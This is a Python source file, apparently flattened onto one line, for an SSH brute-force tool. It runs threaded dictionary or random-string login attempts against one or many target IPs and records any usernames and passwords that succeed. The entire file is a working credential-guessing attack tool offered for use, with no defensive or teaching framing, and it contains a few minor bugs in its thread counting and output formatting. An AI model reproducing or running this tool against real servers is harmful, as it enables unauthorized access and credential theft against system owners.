''' Created on Aug 25, 2011 @author: r4stl1n ''' import random import sys from optparse import OptionParser import Util from Connection import Connection class SSHBruteForce(): def __init__(self): self.info = "Simple SSH Brute Forcer" self.targetIp = "" self.targetPort = 0 self.targets = [] self.usernames = [] self.passwords = [] self.connections = [] self.amountOfThreads = 0 self.currentThreadCount = 0 self.timeoutTime = 0 self.outputFileName = None self.singleMode = False self.verbose = False self.bruteForceLength = 0 self.bruteForceAttempts = 0 self.bruteForceMode = False self.characters = "abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" def startUp(self): usage = '{} [-i targetIp] [-U usernamesFile] [-P passwordsFile]'.format(sys.argv[0]) optionParser = OptionParser(version=self.info, usage=usage) optionParser.add_option('-i', dest='targetIp', help='Ip to attack') optionParser.add_option('-p', dest='targetPort', help='Ip port to attack', default=22) optionParser.add_option('-d', dest='typeOfAttack', help='Dictionary Attack', default=False) optionParser.add_option('-a', dest='attemptAmount', help="Number of attempts before stopping", default=2) optionParser.add_option('-l', dest='lengthLimit', help='Length of bruteforce strings', default=8) optionParser.add_option('-I', dest='targetsFile', help='List of IP\'s and ports') optionParser.add_option('-C', dest='combolistFile', help='Combo List file') optionParser.add_option('-U', dest='usernamesFile', help='Username List file') optionParser.add_option('-P', dest='passwordsFile', help='Password List file') optionParser.add_option('-t', type='int', dest='threads', help='Amount of Threads', default=10) optionParser.add_option('-T', type='int', dest='timeout', help='Timeout Time', default=15) optionParser.add_option('-O', dest="outputFile", help='Output File Name', default=None) optionParser.add_option('-v', '--verbose', action='store_true', dest='verbose', help='verbose') (options, args) = optionParser.parse_args() # First a check is used to see if there is at least a singleIp set or a targetList set if not options.targetIp and not options.targetsFile: optionParser.print_help() sys.exit(1) else: # Check to see if we are running a dictionary attack or a bruteforce if bool(options.typeOfAttack) == True: # Then another check to make sure the Username list and passwordlist are filled if (options.usernamesFile and options.passwordsFile) or options.combolistFile: # Then we check if it is a single ip only if options.targetIp and not options.targetsFile: self.singleMode = True self.singleTarget(options) elif not options.targetIp and options.targetsFile: self.multipleTargets(options) else: optionParser.print_help() sys.exit(1) else: optionParser.print_help() sys.exit(1) else: # setup the brtue force self.bruteForceMode = True # Then we check if it is a single ip only if options.targetIp and not options.targetsFile: self.singleMode = True self.singleTarget(options) elif not options.targetIp and options.targetsFile: self.multipleTargets(options) else: optionParser.print_help() sys.exit(1) def singleTarget(self, options): self.targetIp = options.targetIp self.targetPort = options.targetPort self.amountOfThreads = options.threads self.timeoutTime = options.timeout self.outputFileName = options.outputFile self.verbose = options.verbose self.bruteForceLength = options.lengthLimit self.bruteForceAttempts = options.attemptAmount if bool(options.typeOfAttack): if options.combolistFile: self.usernames, self.passwords = self.__seperateDataFromComboList(options.combolistFile) else: self.usernames = Util.fileContentsToList(options.usernamesFile) self.passwords = Util.fileContentsToList(options.passwordsFile) self.showStartInfo() self.dictionaryAttackSingle() else: self.showStartInfo() self.bruteForceSingle() def multipleTargets(self, options): self.targets = Util.fileContentsToTuple(options.targetsFile) self.amountOfThreads = options.threads self.timeoutTime = options.timeout self.outputFileName = options.outputFile self.verbose = options.verbose self.bruteForceLength = options.lengthLimit self.bruteForceAttempts = options.attemptAmount if bool(options.typeOfAttack): if options.combolistFile: self.usernames, self.passwords = self.__seperateDataFromComboList(options.combolistFile) else: self.usernames = Util.fileContentsToList(options.usernamesFile) self.passwords = Util.fileContentsToList(options.passwordsFile) self.showStartInfo() self.dictionaryAttackMultiple() else: self.showStartInfo() self.bruteForceMultiple() @staticmethod def __seperateDataFromComboList(comboListFile): usernames = [] passwords = [] for t in Util.fileContentsToTuple(comboListFile): usernames.append(t[0]) passwords.append(t[1]) return usernames, passwords def showStartInfo(self): print("[*] {} ".format(self.info)) if self.singleMode: print("[*] Brute Forcing {}".format(self.targetIp)) else: print("[*] Loaded {} Targets ".format(str(len(self.targets)))) if self.bruteForceMode == False: print("[*] Loaded {} Usernames ".format(str(len(self.usernames)))) print("[*] Loaded {} Passwords ".format(str(len(self.passwords)))) print("[*] Brute Force Starting ") if self.outputFileName is not None: Util.appendLineToFile("{}".format(self.info), self.outputFileName) if self.singleMode: Util.appendLineToFile("Brute Forcing {} ".format(self.targetIp, self.outputFileName)) else: Util.appendLineToFile("Loaded {} Targets ".format(len(self.targets)), self.outputFileName) Util.appendLineToFile("Loaded {} Usernames ".format(len(self.usernames)), self.outputFileName) Util.appendLineToFile("Loaded {} Passwords ".format(len(self.passwords)), self.outputFileName) Util.appendLineToFile("Brute Force Starting ", self.outputFileName) def dictionaryAttackSingle(self): for username in self.usernames: for password in self.passwords: self.createConnection(username, password, self.targetIp, self.targetPort, self.timeoutTime) if self.currentThreadCount == self.amountOfThreads: self.currentThreadResults() self.currentThreadResults() def dictionaryAttackMultiple(self): for target in self.targets: for username in self.usernames: for password in self.passwords: self.createConnection(username, password, target[0], int(target[1]), self.timeoutTime) if self.currentThreadCount == self.amountOfThreads: self.currentThreadResults() self.currentThreadResults() def bruteForceSingle(self): for x in range(int(self.bruteForceAttempts)): randomUserString = "" randomPasswordString = "" randomStringLength = random.randint(4, int(self.bruteForceLength)) for y in range(randomStringLength): randomUserString = randomUserString + random.choice(self.characters) randomStringLength = random.randint(4, int(self.bruteForceLength)) for z in range(randomStringLength): randomPasswordString = randomPasswordString + random.choice(self.characters) self.createConnection(randomUserString, randomPasswordString, self.targetIp, self.targetPort, self.timeoutTime) if self.currentThreadCount == self.amountOfThreads: self.currentThreadResults() self.currentThreadResults() def bruteForceMultiple(self): for target in self.targets: for x in range(self.bruteForceAttempts): randomUserString = "" randomPasswordString = "" randomStringLength = random.randint(4, self.bruteForceLength) for y in range(randomStringLength): randomUserString = randomUserString + random.choice(self.characters) randomStringLength = random.randint(4, self.bruteForceLength) for z in range(randomStringLength): randomPasswordString = randomPasswordString + random.choice(self.characters) self.createConnection(randomUserString, randomPasswordString, target, self.targetPort, self.timeoutTime) if self.currentThreadCount == self.amountOfThreads: self.currentThreadResults() self.currentThreadResults() def createConnection(self, username, password, targetIp, targetPort, timeoutTime): connection = Connection(username, password, targetIp, targetPort, timeoutTime) connection.start() self.connections.append(connection) self.currentThreadCount += 1 if self.verbose: print("[*] Adding Target: {0}, Testing with username: {1}, testing with password: {2}".format(targetIp, username, password)) def currentThreadResults(self): for connection in self.connections: connection.join() if connection.status == 'Succeeded': print("[#] TargetIp: {} ".format(connection.targetIp)) print("[#] Username: {} ".format(connection.username)) print("[#] Password: {} ".format(connection.password)) if self.outputFileName is not None: #Util.appendLineToFile("TargetIp: {}" .format(connection.targetIp, self.outputFileName)) #Util.appendLineToFile("Username: {} ".format(connection.username, self.outputFileName)) #Util.appendLineToFile("Password: {} ".format(connection.password, self.outputFileName)) Util.appendLineToFile("TargetIp: {} ".format(connection.targetIp), self.outputFileName) Util.appendLineToFile("Username: {} ".format(connection.username), self.outputFileName) Util.appendLineToFile("Password: {} ".format(connection.password), self.outputFileName) if self.singleMode: self.completed() else: pass self.clearOldThreads() def clearOldThreads(self): self.connections = [] self.threadCount = 0 def completed(self): print("[*] Completed Brute Force.") sys.exit(0) if __name__ == '__main__': sshBruteForce = SSHBruteForce() sshBruteForce.startUp() print("[*] Brute Force Completed")